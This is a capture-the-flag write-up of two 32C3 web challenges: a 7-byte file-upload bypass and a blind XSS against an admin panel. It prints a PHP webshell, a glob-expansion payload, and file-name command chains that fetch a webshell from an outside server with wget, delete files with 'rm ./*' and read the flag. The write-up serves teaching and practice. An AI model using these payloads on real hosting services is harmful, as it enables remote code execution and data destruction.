
32C3 CTF: Writeup for Two Web Challenges

Jun 20, 2016 pm 12:41 PM

0x00 Introduction

As a mere salesperson, I am very happy that I can still manage Web challenges. This time I worked on two challenges: TinyHosting and Kummerkasten.

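0x01 TinyHosting

A new file hosting service for very small files. could you pwn it? http://136.243.194.53/

First, a hidden src parameter can be found in the page. Appending ?src=1 to the URL returns the page's source code.

Roughly, the source says that files with arbitrary file names can be uploaded to the server, but the content of each file can be only 7 characters long.

So I googled first; the shortest PHP webshell appears to be this 14-character one: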

```php
<?=`$_GET[1]`;
```

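(PS: this code was escaped in the original article; apologies if there are any errors.)

Clearly, 7 characters is not long enough for that.

After a lot of brainstorming I thought of the lovely `*`, so the key payload is: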

```
z.php
```

with the content:

```php
<?=`*`;
```

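Exactly seven characters, no more and no less, and it runs everything in the current directory in order: the backticks hand `*` to the shell, which expands it to the file names in the current directory in sorted order and runs the result as one command line (the first name is the command, the rest are its arguments).

So some execution chains have to be constructed. The initial idea was: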

```bash
busybox ftpget two.dog w.php z.php
```

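The contents of the first 4 files are arbitrary, and w.php is the key payload from above; after w.php is executed, its content is overwritten by the webshell on my server, which gives a webshell.

Sadly, it turned out that busybox ftpget only accepts an IP address as the host and does not support domain names.

Later I thought of building the chain with wget instead, taking advantage of the fact that a 302 redirect can cross protocols.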

```bash
wget wtf.two.dog z.php
```

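The first two files have arbitrary content and z.php is the key payload, which is enough to get the webshell.

But on closer inspection, this challenge creates an index.html in every user's directory, so the execution chain is broken and cannot work.

So bash is used to get rid of index.html first.

Construct: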

```bash
bash bb index.html z.php
```

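The content of bash is arbitrary, and the content of bb is `rm ./*`, which does not exceed 7 characters. After that, the method above yields a webshell, and a flag is found in the root directory.

Afterwards I looked at how overseas players solved it, which was really simple and handy: they used only bash, bb and z.php, with the content of bb being `ls /` and then `cat /f*`. Simple and direct 0 0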
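The following is an added illustration, not part of the original writeup: it shows which command line a bare `*` turns into for the file sets named above, and why the service's index.html displaces the command word. It only prints the expansion and never runs it; the helper names `glob_argv` and `command_word` are hypothetical, and the files are empty placeholders created in a scratch directory.

```shell
#!/bin/sh
# Added illustration: print the command line a bare `*` becomes, without running it.
# File names are the ones from the writeup; the files themselves are empty.

# glob_argv NAME...: create empty files with these names in a scratch directory
# and print what `*` expands to there, one word per line.
glob_argv() {
    dir=$(mktemp -d) || return 1
    (
        cd "$dir" || exit 1
        for name in "$@"; do : > "$name"; done
        LC_ALL=C; export LC_ALL      # pin the sort order used by the expansion
        set -- *                     # the same expansion the shell does for `*`
        printf '%s\n' "$@"
    )
    rc=$?
    rm -rf "$dir"
    return $rc
}

# command_word NAME...: first word of the expansion, i.e. what would be executed.
command_word() {
    glob_argv "$@" | head -n 1
}

echo "wget chain alone:";              glob_argv wget wtf.two.dog z.php
echo "with the service's index.html:"; glob_argv wget wtf.two.dog z.php index.html
echo "bash chain:";                    glob_argv bash bb index.html z.php
```

Because the command line is assembled from the file names, the 7-character content cap does not constrain it; a service like this needs to assign its own file names and keep uploads where PHP is not executed.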

0x02 Kummerkasten

Our Admin is a little sad this time of the year. Maybe you can cheer him up at this site http://136.243.194.46/ Please note: This challenge does not follow the flag format.

Hints: To build the flag, concatenate both parts and omit '32C3_'

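Once inside, there is only a form for submitting a message. I looked around and found nothing else, so it felt like this would be related to XSS.

I simply submitted a blind XSS payload that grabs the cookie and received a callback:

Visiting that address returns a 403, so it seemed that XSS would be needed to read the page content.

The original idea was to pull jQuery in through the XSS and then work with jQuery, but it turned out the page already includes it, which is very convenient.

With ajax the page can easily be read and sent back.

That showed /admin/bugs and /admin/token

Judging from the information in the page, the key is to read two png images back.

The final payload is as follows:

Then the contents of the two images, a mysql password and a 6-digit number, concatenated together are the FLAG.

0x03 Other

More writeups can be found at the following link: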

https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/web
